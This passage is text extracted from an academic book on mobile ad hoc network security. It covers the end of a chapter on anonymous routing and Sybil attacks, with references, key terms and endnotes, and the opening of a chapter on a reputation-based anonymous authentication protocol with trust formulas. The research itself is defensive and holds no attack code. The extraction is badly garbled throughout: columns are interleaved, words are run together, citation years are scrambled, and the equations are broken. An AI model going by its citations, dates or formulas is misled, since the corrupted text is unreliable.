the cost of including strong assumptions also for mobile ad hoc networks, many approaches
regarding in beforehand mutual distribution for detecting Sybil attacks have been proposed. In
of secrets (e.g., ARM, ANODR). this section, we discuss why Sybil attacks threaten
3. It is straightforward to hide the identity of anonymity in ad hoc networks, and discuss some
the sender from other network nodes. This proposed countermeasures.
is probably because most of the approaches
use classical techniques for hiding the identity the sybil Attack in Mobile Ad Hoc
of the sender, such as layered encryption, that networks
have been used before in other contexts.
4. No anonymous routing protocol imple- Mobile ad hoc networks are highly susceptible to
ments sender anonymity towards the Sybil attacks because of, for instance, the lack of
receiver. Hiding the sender identity during reliable network or data link identifiers, and t
route discovery would require a mechanism absence of a trusted entity capable of vouching for
for hiding the propagation of the RREP mes- the one-to-one binding between physical devices
sages similar (and equally costly as) to the andlogicalnetworkidentifiers.Thismaygivethe
invisible implicit addressing schemes used impression that ad hoc nodes are naturally anony-
for hiding the propagation of the RREQ
mous as nodes could confuse observers by regularly
messages. changing their {IP, MAC} pairs. Although this
may prevent long-term tracking, other problems
may arise. For instance, when there is a need to
futurE trEnds identifyanodeofferingaspecificservice,arouge
node could easily impersonate this service. The

absence of reliable network identifierspairs may also

represent Sybil nodes. One drawback
disrupt routing, as a rouge user could announce with this strategy is that it is unclear how to
false information using multiple {IP, MAC} pairs. prevent a detected attacker from generating
Also, as senders and receivers establish direct new {IP, MAC} pairs and relaunch a new
connections, they are still vulnerable to traffic
attack later, as there is no underlying long-
analysis and physical layer oriented attacks (Cap- term identity that can be blocked from the
kun et al., 2004). system.
However, the Sybil attack also poses a threat • Another strategy is to cryptographically
against anonymous routing protocols and anony- guarantee a one-to-one mapping between all
mous overlay networks. For both approaches, the temporal network identifiers - seen in a par
anonymity set denotes the user base. There are some ticularnetworkandcorrespondingcertifie
differences though. In an anonymous overlay net- long-termidentifiers(Martuccietal..)028 ,
work, the anonymity set is used as a pool of nodes To tailor this approach for ad hoc networks,
serving as an input parameter to the path creation the nodes must be able to assert the validity
algorithm. Polluting the anonymity set with many of the temporal identifiers without having
Sybil identities might yield a path only containing to interact with the TTP. Further, to protect
Sybil identities. If this happens, the attacker can privacy, only the TTP should be able to link
easily break anonymity by linking the sender to a temporal identifier to the corresponding
the receiver. In an anonymous routing protocol, long-term identifier and there should be
however, each node only stepwise extends the unlinkability between temporal identifier
path to another node within a single-hop distance, used in different contexts. The fact that you
until the receiver is reached. Thus, the locations needreliableidentifierstoprotectagainst
of the nodes play a more important role here, and Sybil attack and to provide reliable anony-
as all Sybil identities share the same location, it mous communication has been labeled as the
isdifficultfortheattackertoforcetheidentity-anonymity creationof paradox (Martucci et al.,
paths in which it controls all nodes. 2006).
Thus, the Sybil attack poses a greater threat
to anonymity in anonymous overlay networks
compared to anonymous routing, although it still conclusIon
poses a great threat to other security properties
for anonymous routing. In mobile ad hoc networks, anonymous com-
munication can either be enabled by anonymous
Mechanisms for detecting the sybil routing protocols or anonymous overlay networks.
Attack in mobile Ad Hoc networks Currently, anonymous routing is the most popular
approach, although future requirements, such as
In this section, we describe two recent propos- exibility
fl regardingtheapplications,mayraisethe
als for thwarting Sybil attacks in mobile ad hoc need for anonymous overlay networks.
networks. We evaluated commonly proposed anonymous
• The fact that Sybil nodes in mobile ad hoc routing protocols and anonymous overlay networks
networks naturally travel together in clusters for mobile ad hoc networks against a set of evalua-
can be used for detecting Sybil attacks (Piro tion criteria and showed that a number of research
et al., 2006). Piro et al. propose a detection challenges remain. For instance, it is difficult to
mechanism in which each node records offer receiver anonymity without using a complex
all encountered {IP, MAC} pairs. If a user and performance-hampering invisible implicit
repeatedly observes a set of {IP, MAC} addressing scheme, and it is further difficult to
pairs sharing the same location, there is an protect against global observers.
increased likelihood that these {IP, MAC} Finally, we introduced Sybil attacks, a notorious

threat to all computer networks, including mobile ad Douceur, J. R. (2002). The Sybil attack. In P.
hoc networks. We expect that the area of enabling Druschel, F. Kaashoek, & A. Rowstron (Eds.),
reliableidentifiersinaprivacy-friendly mannerSystems:
Peer-to-peer is Proceedings of the 1st
an interesting future research area. International Peer-to-Peer Systems Workshop
(IPTPS) (pp. 251-260). Springer-Verlag.
Goldschlag, D. M., Reed, M. G., & Syverson, P.
rEfErEncEs F. (1996). Hiding routing information. Informa-
tion hiding (LLNCS 1174, pp. 137-150). Springer-
Andersson, C., Martucci, L. A., & Fischer-Hübner,
Verlag.
S. (2005). Requirements for privacy: Enhance-
ments in mobile ad hoc networks. In Proceedings Jiang, S., Vaidya, N. H., & Zhao, W. (2004). A
of the 3rd German Workshop on Ad Hoc Networks mix route algorithm for mix-net in wireless mobile
(WMAN ) 502 (pp. 344-348). Gesellschaft für ad hoc networks. In Proceedings of the 1st IEEE
Informatik (GI). International Conference on Mobile Ad Hoc and
Sensor Systems (MASS 2004).
Boukerche, A., El-Khatib, K., Xu, L., & Korba, L.
(2004). A novel solution for achieving anonymity Johnson, D. B., & Maltz, D. A. (1996). Dynamic
in wireless ad hoc networks. In Proceedings of the source routing in ad hoc wireless networks. In
7th ACM International Symposium on Modeling, Computer Communications Review: Proceed-
Analysis and Simulation of Wireless and Mobile ings of the ACM SIGCOMM’96 Conference on
Systems (pp. 30-38). Communications Architectures, Protocols and
Applications.
Capkun, S., Hubaux, J. P., & Jakobsson, M. (2004).
Secure and privacy-preserving communication in Kong, J., Hong, X., Sanadidi, M. Y., & Gerla, M.
hybrid ad hoc networks (EPFL-IC Tech. Rep. No. (2005). Mobility changes anonymity: Mobile ad
IC/2004/10). Lausanne, Switzerland: Laboratory hoc networks need efficient anonymous routing.
for Computer Communications and Applications In Proceedings of the 10th IEEE Symposium on
(LCA)/Swiss Federal Institute of Technology ComputersandCommunications(ISCC . ) 502
Lausanne (EPFL).
Levine, B. N, Shields, C., & Margolin, N. B.
Chaum, D. (1981). David Chaum: Untraceable (2006). A survey of solutions to the Sybil attack
electronic mail, return addresses, and digital (Tech. Rep. 2006-052). Amherst, MA: University
pseudonyms. Communications of the ACM, 24(2), of Massachusetts Amherst.
84-88.
Martucci, L. A., Andersson, C., & Fischer-Hübner,
Cheng, Y., & Agrawal, D. P. (2006). Distributed S. (2006). Chameleon and the identity-anonymity
anonymous security routing protocol in wireless paradox: Anonymity in mobile ad hoc networks.
mobile ad hoc networks. Paper presented at the In Short-Paper Proceedings of the 1st Interna-
OPNETWORK 2005. tionalWorkshoponSecurity(IWSEC(pp. )0 2 6
123-134).
Corson, M. S., & Macker, J. (1999). Mobile ad hoc
networking (MANET): Routing protocol perfor- Martucci, L., Kohlweiss, M., Andersson, C.,&
mance issues and evaluation considerations (RFC- Panchenko, A. .)028( Self-certified Sybil-free
2501), Internet RFC/STD/FYI/BCP Archives. pseudonyms. In 1st ACM Conference on Wireless
Network Security (WiSec 2008).
Dıaz, C., Seys, S., Claessens, J., & Preneel, B.
(2002). Towards measuring anonymity. In Pro- Perkins, C. E. (2001). Ad hoc networking. Addison-
ceedings of the Workshop on Privacy Enhancing Wesley Professional.
Technologies (PET 2002) (LNCS 2482). Springer-
Perkins, C. E., & Royer, E. M. (1999). Ad-hoc on
Verlag.
demand distance vector routing. In Proceedings

of the 2nd IEEE Workshop on Mobile Computing Yang, L., Jakobsson M., & Wetzel, S. (2006). Dis-
SystemsandApplications(WMCSA. )9‘ count anonymous on demand routing for mobile
ad hoc networks. In Proceedings of SecureComm
Pfitzmann,A.,&Hansen,M.026)( Anonymity,
02 6 , Baltimore, MD.
unlinkability, unobservability, pseudonymity, and
identity management: A consolidated proposal for Zhang, Y., Liu, W., & Lou, W. (2005). Anonymous
terminology v0.27. Retrieved April 25, 2007, from communication in mobile ad hoc networks. In
http:// dud.inf.tu-dresden.de/literatur/Anon_Ter- Proceedings of the 24th Annual Joint Conference
minology_v0.28.doc of the IEEE Communication Society (INFOCOM
) 502 , Miami.
Pfitzmann, A., & Waidner, M..7)89Networks
1(
without user observability. Computers and Secu-
rity, 6 (2), 158-166.
Piro, C., Shields, C., & Levine, N. L. (2006). De-
kEy tErMs
tecting the Sybil attack in mobile ad hoc networks.
Anonymity:Thestateofbeingnotidentifiable
In Proceedings of the IEEE/ACM International
within a set of subjects.
Conference on Security and Privacy in Commu-
nication Networks (SecureComm). Anonymity Metrics: Metrics for quantifying
the degree of anonymity in a scenario.
Reiter, M., & Rubin, A. (1997). Crowds: Anonymity
for Web transactions. Technical report No. 97-15, Mobile Ad Hoc Network: Networks consti-
DIMACS (pp. 97-115). tuted of mobile devise which may function without
the help of central infrastructure or services.
Serjantov, A., & Danezis, G. (2002). Towards
and information theoretic metric for anonymity. Privacy: The right to informational self-de-
In Proceedings of the Workshop on Privacy En- termination, that is, individuals must be able to
hancing Technologies (PET 2002) (LNCS 2482) determine for themselves when, how, to what
.Springer-Verlag. extent, and for what purpose personal information
about them is communicated to others.
Seys, S., & Preneel, B. (2006). ARM: Anonymous
routing protocol for mobile ad hoc networks. In Receiver Anonymity: Implies that a message
Proceedings of International Workshop on Per- cannot be linked to the receiver.
vasive Computing and Ad Hoc Communications
(PCAC)06‘ . Sender Anonymity: Means that a message
cannot be linked to the sender.
Shannon, C. E. (1948). A mathematical theory of
communication. The Bell System Technical Jour- Unlinkability: If two items are unlinkable,
nal, 27, 379-423. they are no more or less related after an attacker’s
observation than they are related concerning the
Song, R., Korba, L., & Yee, G. (2005). AnonDSR: attacker’s a-priori knowledge.
Efficientanonymousdynamicsourceroutingfor
mobile ad-hoc networks. InProceedingsofthe502
ACM Workshop on Security of Ad Hoc and sensor
NetworksSASN ( ) 502 (pp. 32-42). Alexandria. End notEs
Sweeney, L. (2002). k-Anonymity: A model for 1
As devices in ad hoc networks are responsible
protecting privacy. International Journal on for their own services, including security and
Uncertainty, Fuzziness and Knowledge-based routing, protocols for anonymous communi-
Systems, 10(5), 557-570. cation for wired networks are not suitable for
ad hoc networks, not even those based on the

6
peer-to-peer paradigm (P2P) (Andersson et In the survey, we omit approaches relying on
al., 2005). the existence of either a positioning device
2
This method is sometimes also called tele- (e.g., GPS) in the mobile devices or a location
scope encryption. A public key based version server in the mobile ad hoc network.
7
of the method was initially introduced by A global observer is an observer that is capable
Chaum (1981). Onion Routing, which only ofobservingallnetworkstrafficinthewhole
uses public key encryption for setting the network.
8
path, and then relies on symmetric encryp- Note that no anonymity is provided against
tion, was later proposed by Goldschlag, Reed, the access points (not included in attacker
and Syverson (1996). model).
3
The Crowds-based metric was developed 9
Batching and reordering traffic to hide the
for Crowds, but has since been used in other correlation between incoming and outgoing
contexts. traffic.
4 10
This denotes the process of setting a path No sender anonymity if path length is one.
11
between the sender and a receiver. First, the No receiver anonymity against last mix on
sender oods fl a route request (RREQ) into the path.
12
the network, which triggers the sending of It is commonly believed that omnipresent
a route reply (RREP) from the receiver to protection against a global observer can only
the sender. During the propagation of the be achieved if all nodes transmit a constant
RREQ and RREP, respectively, the path is ow fl of traffic, requiring massive usage of
interactively formed. dummytraffic.
5
In the context of mobile ad hoc networks,
this method is often referred to as a global
trapdoor.

Chapter XXVIII
Secure Routing with
Reputation in MANET
Tomasz Ciszkowski
Warsaw University, Poland
Zbigniew Kotulski
Warsaw University, Poland
AbstrAct
The pervasiveness of wireless communication recently gavemobileadhocnetworks(MANET)signifi -

cant researchers’ attention, due to its innate capabilities of instant communication in many time and
mission critical applications. However, its natural advantages of networking in civilian and military
environments make it vulnerable to security threats. Support for anonymity in MANET is orthogonal
to a critical security challenge we faced in this chapter. We propose a new anonymous authentication
protocol for mobile ad hoc networks enhanced with a distributed reputation system. The main objective
is to provide mechanisms concealing a real identity of communicating nodes with an ability of resist-
ance to known attacks. The distributed reputation system is incorporated for a trust management and
malicious behaviour detection in the network.
IntroductIon IEEE 802.11 family protocols, the communication

between personal and handheld electronic devices
The contemporary information society extensively is easier, comfortable, and mobile. Through the
takes advantage of wireless communication us- years, a lot of researches’ efforts were devoted to
ing several specific network technologies. This
the functional and network performance improve-
continuouslyevolvingareaprovidesaexible fl
ments, and existing standards designed for
covering
convenient way for improving work standards in fully cooperative environments. However, many
business, home, education, or rescue applications. firstpioneeringdeploymentsofwirelessnetwork
Thanks to the pervasiveness of private unlicensed quickly turned out its several vulnerabilities they
spectrum technologies such as Bluetooth and suffer from. Since that time substantially more
Secure Routing with Reputation in MANET
attention has been paid to the security as a supple- bAckground

mentary service protecting and supporting perfor-
manceinwirelesscommunication.Thespecific MANET and is a set of mobile nodes which operates
unique characteristics of mobile ad hoc networks wirelesslyinanenvironmentwithadevoidoffixed
(MANET) such as a multihop routing and highly network structure enforced by self-configuring
dynamic topology impose a new type of security and self-organizing mechanisms. All its nodes
concerns that we present in this chapter. are free to move, join, or leave the network in ad
In response to the vulnerabilities being identi- hoc manner, while the end-to-end communica-
fiedinseveralMANETprotocolsasetofsecurity tion between nodes being beyond its radio range
considerations have taken place in a number of isperformedinamultihopfashion.Thisspecific
extensions to existing nonsecure approaches. Even feature demands for additional requirements to
though, the strong security requirements are met every node that, apart from sending and receiv-
in many MANET protocol designs, only few of ing data, must act as an interconnecting router.
them address anonymity and privacy guaranties Since every node may be obliged to perform data
(Boukerche, 2004; Ciszkowski & Kotulski, 2006; forwarding, appropriate routing algorithms were
Kong & Hong, 2003; Zhang, Liu, & Lou, 2005), developed to meet such a requirement. The main
which are treated as an orthogonal to security objective of routing protocols for ad hoc network
critical challenge we discuss in this chapter. On is creating an up-to-date multihop communication
the example of a novel anonymous authentication path in a dynamically changing network topology.
protocol (ANAP) for mobile ad hoc networks The appropriate and specific path discovery and
(Ciszkowski & Kotulski, 2006) we present an path maintenance algorithms have already been
enhanced distributed reputation system designed developed which characterizes particular routing
for efficient and secure routing in MANET. The
protocols. One can distinguish two groups of pro-
main objective of this work is to provide protocol tocols designed for MANET: reactive (on-demand)
with mechanisms concealing the real identity of the andproactivetable- ( driven)The. firsttypetriest
communicating nodes maintaining the resistance to resolve a path to a destination node on the source
knownattacksChaum, ( Pfitzmann
; 1 89 1 Hansen,
& node demand, whereas the second approach is more
2005). The distributed reputation system is incor- preventive and continuously keeps routing tables up
porated in order to build and manage mutual trust to date by monitoring the nearest neighbourhood.
of the communicating nodes. The trust knowledge The detailed description and comparison of both
reflectsatrustworthyandmaliciousactivity inthe
classes of routing protocols for ad hoc networks
network, effectively improving secure routing in may be found in works by Hu et al. (2002), Johnson
MANET by means of anonymous authentication (1994), and Royer et al. (1999).
and path discovery phases. ANAP delivers links At the moment several applications apart from
for secure exchange of data, taking advantage of strict MANET paradigm take advantage of the
an on-demand routing approach (Hu et al., 2002; dynamic ad hoc routing phenomenon and make use
Perkins & Royer, 1999; Royer & Toh, 1999). of it in an akin to MANET wireless environments
The following sections present related work such as wireless mesh networks or vehicular ad hoc
and protocol designs focusing on the distributed networks (VANET). This increasing application
reputation system improving secure and anony- potential gives the MANET’s security a primary
mous routing in MANET. Two last sections cover concern for researching communities.
some concluding remarks and further research For MANETs there are several solutions
directions. considering multilayer defence against known at-
tacks, mainly focusing on provided services such
asauthentication,anonymity,confidentiality,an
integrity based on the network layer security. Most
of them extend existing protocols for which the
0
scopeofsecurityconsiderationswassignificantly and should assure a self-configurable principle

limited, such as AODV, DSR, DSDV, and LSP of MANET, which is an important and challeng-
(Royer et al., 1999). A complete protection from ing task for the nowadays research (Hu & Perrig,
various attacks in MANET takes into account ac- 2004; Mangipudi, Katti, & Fu, 2006; Yang et al.,
tions such as prevention, detection, and reaction. 2004).
The prevention is usually achieved by means of Even though the many solutions for mobile ad
secure routing protocols (path discovery and main- hoc networks ensure secure communications (Hu
tenance), while the abnormal behaviour detection & Perrig, 2004; Yang et al., 2004), very few of them
is performed by monitoring end-to-end communi- address privacy guaranties as complementary to
cation or by overhearing the local neighbourhood. a strict security approach (Kong, Hong, & Gerla,
In both cases the security extensively employs 2005). The main objective of the anonymous
different cryptographic primitives authenticating communication in mobile ad hoc network is to
routing messages (Hu & Perrig, 2004; Yang, Luo, provide privacy for all of its users represented by
Ye, Lu, & Zhang, 2004). The main difference be- the nodes. Demanding for anonymity imposes a
tween authentication schemes was characterized series of requirements for protocol construction and
in the following list: creates the new types of attacks. A set of formal
notions of the anonymity and its related properties
• First method takes advantage of a single canbefoundbyChaumand ) 1 89 1 ( Pfitzmannand
shared session key widely distributed in the Hansen (2005), where the authors characterize a
group of MANET nodes, for example, used general anonymous system with identity man-
in secure routing protocol (SRP) (Papadimi- agementdesignedforfixednetworktopologybut
tratos & Haas, 2002). This approach does not easily applicable for MANET. ANODR protocol
provide anonymity and is vulnerable to single (Kong & Hong, 2003) delivers a full irrevocable
node compromise. anonymity based on symmetric cryptography
• Second method assumes sharing pair-wise primitives. Note that the pure anonymity of the us-
keys between all nodes in the networks and is ers limits the accountability for malicious activity
used for HMAC in Ariadne (Hu et al., 2002). in the network. In order to avoid such a restriction
It suffers from lack of scalability and in this a revocable anonymity was introduced which is
case of N nodes; N(N-1)/2 keys are required based on pseudonyms managed by trusted third
priory to allow communication. party, as it was proposed in ANAP (Ciszkowski
• Third approach makes use of scalable public & Kotulski, 2006), MASK (Zhang et al., 2005),
key cryptography where digital certificates and SDAR (Boukerche, 2004). Authors of SDAR
and signatures allow the mobile nodes to be identifiedthatanonymousMANETisan - environ
mutually authenticated (Sanzgiri, Dahill, ment suffering from the lack of personal and direct
Levine, Shields, & Belding-Royer, 2002; incentives to be well cooperative between nodes.
Zapata & Asokan, 2002). It is a principle In order to overcome this important vulnerability,
method for secure routing in ARAN, SEAD, SDAR was proposed: a node’s trust management
and SAODV. Although this method is linearly system providing a scoring of node’s local activ-
scalable when a node’s number increases, its ity whereby during the communication the most
exibility
fl and efficiency may suffer from trustful nodes were promoted.
vulnerability to denial-of-service (DoS) at- In the anonymous communication in the mobile
tacks and computation overhead. ad hoc networks the trust management is used for
misbehaviour detection and nodes evaluation. This
All of aforementioned methods assume exis- evaluation creates a long-term node assessment
tence of trusted authority TA (certifying authority called a reputation. A reputation is known from
CA) dealing with a key setup phase. The online e-market mostly thanks to online auctioning sys-
and distributed TA supports key management tems,butintermsofMANET,itwasdefinedby

Buchegger (2005) as a means for providing incen- rEPutAtIon-bAsEd sEcurE

tives for good behaviour of nodes and metric used routIng In MAnEt
for identifying the most truthful node. The main
purpose of reputation management is a detection In many secure routing protocols for mobile ad
of any untrustworthy behaviour in the network hoc networks (Hu & Perrig, 2004; Yang et al.,
interfering to ordinary and regular functions such 2004) it can be found only few proposals con-
asroutingnext ( hopfinding)forwarding
, (packets
sidering anonymity as critical service assuring
relaying)and, , finally,isolatingoriginators privacyoffor
such
MANET’s customers ANODR, MASK,
an activity. This goal of reputation management SDAR and ANAP. The demand for anonymity
motivates nodes to be cooperative and improves in an open environment, such as mobile ad hoc
the network security and performance. networks, decreases node accountability and may
Blaze, Feigenbaum, and Lacy (1996) argue for be a source of unexpected behaviour coming from
enhancing the existing trust management systems unknown network identities. It is postulated that by
that incorporate PGP (Zimmermann, 1994) and PKI incorporating a distributed reputation system into
infrastructure of X.. 09They 5 propose a exible
fl secure routing protocol we can detect and avoid
and independent security system, PolicyMaker, cooperation of hostile and anonymous nodes. The
which deals with policy management. They point reputation system is an essential part of routing in
out that trust transitiveness usually depends on MANET, which facilitates a prediction of node’s
the context of service, for example, e-main, link behaviour and improves a performance of an
capacity, and quality of service in data forwarding, anonymous communication. The reputation system
while PGP and X.509 support a trust transiting provides a set of mechanisms and polices that when
considering only guaranties of an association of applied locally, similar to PolicyMaker (Blaze et
public key with its owner’s identity. One of the al., 1996), allow assigning of a value of trust to a
first solutions addressing the trust transitiveness
particular action performed in the network. Such
inMANETswasprotocol’sConfidant(Buchegger an approach maintains trust knowledge of local
Le
& Boudec,and ) 02 SDAR.Confidantincor - neighbourhood activity without revealing its real
porates the reputation system maintaining a node identity. This information acts as a probability of
trust, path rates, and shared reputation informa- future intentions and behaviours in the network and
tion; however its construction does not provide the may be used to enforce the path discovery process
anonymous communication. The protocol SDAR by choosing the communication path containing
supports a secure and anonymous communication only trusted nodes.
but the proposed reputation system is limited in
itsefficiencybecauseitsupportsonlytrust three andlevels reputation Modelling
of permissible trust that a node may obtain.
In the next section we present an introduction In the literature it can be found that many inter-
to the reputation-based secure routing, defining
changeable cases of the use of reputation and trust,
concepts of trust and reputation in relation to the even though, in popular understanding, they are not
mechanism of its modelling and managing. In the synonyms. In order to avoid any mistakes in this
main part of the following section, we introduce chapter we correspond with Hussain, Chang, and
an example of a distributed reputation model Dillon’sdefinitions,
)0 2 4 ( andbytrustwemean
implemented in an anonymously authentication a subjective probability of a one peer (trustee), so
protocol for mobile ad hoc network (Ciszkowski that the particular actions of another peer (trusted)
& Kotulski, 2006). they are willing and capable to perform will be done
according to the trustee’s expectations in the given
contextandtime.Thedefinedtrustisasymmetrical
and usually represented by knowledge gathered
during direct interactions and observations. The

reputation is a perceived grade of trustworthiness modifiedbyafeedbackcontrolunitaccordingto

to a particular peer created by their historical be- the trust-policing module. The related probabilistic
haviour during observations and interactions with trust management methods are very attractive, but
third party peers in the given context and time. they usually suffer from complexity of probability
This definition describes a concept oflogic the peer’s into calculations.
incorporated
reputation expressed by a level of aggregated trust Very interesting and especially suitable for
exchanged and shared between other peers. The MANET trust model is an enhanced reputation
main difference between the reputation and trust model for mobile ad hoc networks proposed by
is that the subjective trust is usually created by the Liu and Issarny (2004). It takes advantage of the
direct and own experience while the reputation is monitoring system as a principle module of misbe-
established combining other’s trust knowledge. haviour detection (Buchegger & Le Boudec, 2002),
Considering the stated explanation, the reputation which was effectively improved by exchanging the
tends to represent a generalized opinion in a local second-hand information (Buchegger, 2005). This
group of peers. As the reputation may comprise work considers self-experience of nodes, time, and
an aggregated trust of several network nodes, it contextdependencyandintroducesthedefinitio
becomes a very valuable metric that supports the of services and recommendation reputation. In
routing process. The measure expressing the level SDAR for anonymous MANET a three level of
of trustworthiness for a particular node is also community management trust was introduced, in
an important incentive for cooperation and good which every node may act as a central node of the
behaviour in the anonymous ad hoc network. community consisting of the rest nearest one-hop
In terms of trust aggregation, sharing, and neighbours. The reputation is created locally, based
assessment, we can distinguish several types of ondetectedpacketdropsandmodifications.Inthe
modelling and management of the reputation in network one distinguishes three classes of trust,
collaborative environments such as P2P networks, which are assigned to every node. Trustworthy be-
auctioning systems, and in particular, MANET. haviour usually promotes nodes to the higher trust
In one of the leading concepts of modelling, the levelbutfinallyitmaydependonlocalpolices.A
distributed reputation assumes probabilistic rep- route discovery process is conducted considering
resentation of trust and introduces importance or a node’s class membership. The main drawback of
uncertainty of shared knowledge. Lee, Hwang, Lee, this approach is a low granularity of trust classes
and Kim (2006) apply the fuzzy set theory for the and considering only the local own experience.
trust modelling. This approach defines multiple
evaluating criteria with different importance fac- distributed reputation for secure
tors. It allows building of trust by classifying the MAnEt
different types of observations and aggregating
them with different importance weights. Since In this section we present a distributed reputation
every criterion is strictly related to a class of system, which extends Liu’s and Issarny (2004)
observations, the interpretation of shared reputa- reputation model incorporated in ANAP (Cis-
tion depends on own preferences. Jøsang (2002) zkowski & Kotulski, 2006). We propose a new
introduces the subjective logic where the trust method of evaluating recommendation reputation
is represented by a probability vector named an considering past experience and recommendation
opinion, which is composed of belief, disbelief, reputation of voters recommends) ( . We define
uncertainty, and atomicity function. The atomicity two types of second-hand information, related to
function additionally determines the rate of the the immediate nodes and cumulative reputation
uncertainty in expected value of trust. Based on this describing aggregated reputation of immediate
approach, Huang, Hu, and Wang, (2006) propose nodes’ neighbourhood. Second-hand information is
a system similar to Lee et al.’s (2006) weighted exchanged on demand of interested nodes. In order
evaluation trust, but the weights are dynamically to detect malicious activity and any anomalies in

information exchange we incorporated a second- as a reputation of path going from B through

hand recommendation validation by a statistical node A
correlation approach. • PRnB(A) – path reputation is a product of
The reputation depends on time, own past service and cumulative reputation and ex-
experience, second-hand information, and is expresses the trust of a path going from node
pressed by a level of trust. These input features are B through the node A at time n,
organized with a reputation dynamic evaluation • STEB(A) – satisfaction degree of node B dur-
scheme providing a node assessment. A proposed ing elementary interaction with the node A
model consists of the following definitions • STnB(A) and– average satisfaction degree of node
assumptions: B during several elementary interactions with
the node A in time n
B
• SRn (A) – service reputation held by B ex- • OEnB(A)t – own experience of node B based
pressing a level of trust to node A in time on history of interactions with the node A
n, and is taken into account whenever B is • Nodes exchange V information with truthful
going to interact with A neighbours
B
• IRn (C) – information reputation held by B • Aforementioned parameters vary in range
expressing the level of trust for second-hand >,1 , where
-< themostpositivevaluereflects
information VnBC received from node C at to the trustworthiest parameter
time n, and is used for evaluating received
the second-hand information from C The building process of key reputation metrics
• VnBC(A) – second-hand information (vote) is illustrated in Figure 1.
coming from C to B; contains a recommen- We introduced a virtual discrete time n in order
dation of trust to node A, for an honest node to make the event-based nature of building repu-
is equal SRnC(A) tation independent on real time. The virtual time
• CRnB(A) – cumulative reputation expressing depends on a number of events and its quantum
an aggregated grade for A’s neighbourhood consists of constant Q elementary interactions
which is unreachable by B at time n, it acts STEi. Every STEi is expressed by Equation (1) and
Figure 1. Model of distributed reputation system providing the following vector metrics: own experience
OEB(A), votes VB(A), service reputation SRB(A), cumulative reputation CRB(A) and path reputa
PRB(A)
B
SR (A) CR B(A)
B
V (A)
OE B(A)
B AA
B
V (A)
B
PR (A)

depends on a set of weighted metrics m monitored taking into account the information reputation (IR)
by a node during network packets exchanging. A of recommending nodes. Considering a set GV of
metrics vector corresponds to all kinds of detect- voting nodes on A, the node B takes into account
able observations such as every overheard packet only nodes with positive IR. Own information
modifications, attacks (DoS, reply attack, is usuallyetc.,more
) valuable (Kong et al., 2005; Bu-
andnetworkqualityofserviceQoS) ( chegger, 2005), hence scaling factor ∈< 0,1 > is
parameters,
for example, transmission delay and packet drops. introduced to the formula:
This set of direct measurement is evaluated by
expectation function E, which allows the assigning SRnB ( A) = OEnB ( A) + (1 − )
∑ p∈GV \B IRnB ( p)VnBp ( A) , IR ( p) > 0
∑ p∈GV \B IRnB ( p)
n
of different importance factor to a particular type

of its arguments. The STEi building process should (4)
take into account all observable misbehaviour
definedattheendofthissection. Note that nodes cooperating rarely have small
L −1 service reputation SR and are less trustworthy.
STEiB ( A) = ∑
j =0
w j Ei (m j ) In order to evaluate a credibility of recom-
(1) mendation V obtained from neighbouring nodes,
it is required to update the information reputation
After every Q interactions between B and A, (IR). In our model we propose a formula, which
the time value n is incremented and aggregated considers close relations between node’s experi-
STEi updates satisfaction degree ST: ences (OE) with particular node, say A, as well
L −1 as other voter’s IR:
∑
1
STnB ( A) = STEi
Q i =0 (2) IRnB (C ) = OEnB (C ) −
∑ p∈GV \B IRnb ( p) |VnBp (C ) − OEnB (C ) | , IR ( p) > 0
∑ B n
2 p∈GV \B
IRn ( p)
The proposed model takes advantage of past (5)

experiencewithaL-length finitememory, where
every reputation measure with time n - L becomes where β∈<0,1> is a scaling factor for own
the oldest value and is forgotten. experience. It is recommended to let the service
An own experience of node B at time n is based reputation (SR) evolve more dynamically then an
on the history of interactions with the node A and information reputation (IR), which is equivalent
is evaluated as weighted average of ST: to β<α. This allows nodes to rehabilitate their
service reputation faster than their recommenda-
∑
L −1 B
j =0 j STn − j ( A) tion credibility. It means the nodes providing only
OEnB ( A) = , a good service are able to rebuild already lost the
∑
L −1
j =0 j information reputation.
Revealing all node identities on the commu-
where nication path one could provide an easy way for
building a global node reputation and evaluate a
 , n=0
n = reputation along path, from the source to the des-
(1 − ) , n>0
n+1
(3) tination. However, in ANAP for a communication
path longer than three hops a physical identity of
γn is an exponential fading function and depends nodes lasts pure anonymous. Therefore we evaluate
on time, where 0<ρ<1. a cumulative reputation (CR) for the intermediate
Whenever the own experience (OE) is updated node, as an aggregated trust for its neighbour nodes,
or the second-hand information V is obtained the which are unreachable by the source node. This
service reputation (SR) is modified. SR consists metricreflectsareputationalongapathanddoes
of own experience and weighted average of votes not break the anonymity:

∑
L −1
CRnB ( A) =
∑ V Bp (A )
p∈GAV \GBV n
, IRn ( p ) > 0
RîO = n =0
OEnOEn−i (10)
GAV \ G AB RîV =∑
L −1
VV
(6) n =0 n n −i (11)
where GBV and GAV are sets of nodes being Defineddistancefunctionsforeverynewvote

in neighbourhood of respectively node B and A. V provide a measure of correlation change be-
Every time a source node wants to send data to tween own experience and already known history
an immediate node it calculates a path reputation of votes from a particular node. Any attempt of
(PR) as a product of service reputation, combin- voting unrelated to the historical observation will
ing own and immediate nodes experience and be observed by substantial increase of distance
cumulative reputation: function DV. Additionally we can observe how
much our own experience differ from the received
PRnB ( A) = SRnB ( A)CRnB ( A) (7) by neighbour nodes analyzing value of DO. These
two metrics should be taken into account if their
A set of path with the highest PR is selected values exceed some threshold separately define
for communication. For path, which PR falls for each of them ThO, ThV. In the case where the
below zero, a communication channel should be abnormal behaviour is detected following actions
closed. may be undertaken:
A trust history evolution of own and immedi-
ate nodes is stored at every node in appropriate • DO > ThO and DV >ThV - the votes from misbe-
reputation parameters, represented by L-length haved nodes are rejected and their information
vectors. This set of information is used for vali- reputation is arbitrary decreased.
dating incoming second-hand votes by means of • DO < ThO and DV >ThV - the votes are accepted
correlation analysis. Note, the own experience but service reputation (SR) is updated with
vector OE is a weighed moving average process higher scaling factor a. This less restrictive
(MA) of the order L. The γ functioncoefficientsapproach gives an ability to react to dynami-
determine the dynamic of changes in MA process cally changing reputation but prevents too
and make the all observation jointly dependent. As fast malicious attacks from targeting too
it was defined in Equations 4 and 5 the - correla discrediting nodes.
tion is propagated to the service reputation (SR) • DO > ThO and DV <ThV - in this case a node
and information reputation (IR) (indirectly by IR reaction should be similar to the previous
influenceto CR and PR). anomaly, however, it may be symptomatic of
The correlation validation is based on autocor- long term attack against reputation service
V by nodes being in collusion.
relation functions of own experience R̂n second-
O
hand information R̂n and distance functions,
respectively O and V: Every node during messages exchanging col-
lects its own experience of elementary interactions
∑
L −1
DO = i =0 ( RîO −RˆVi +1 ) 2 (8) STE. The following list describes types of behav-
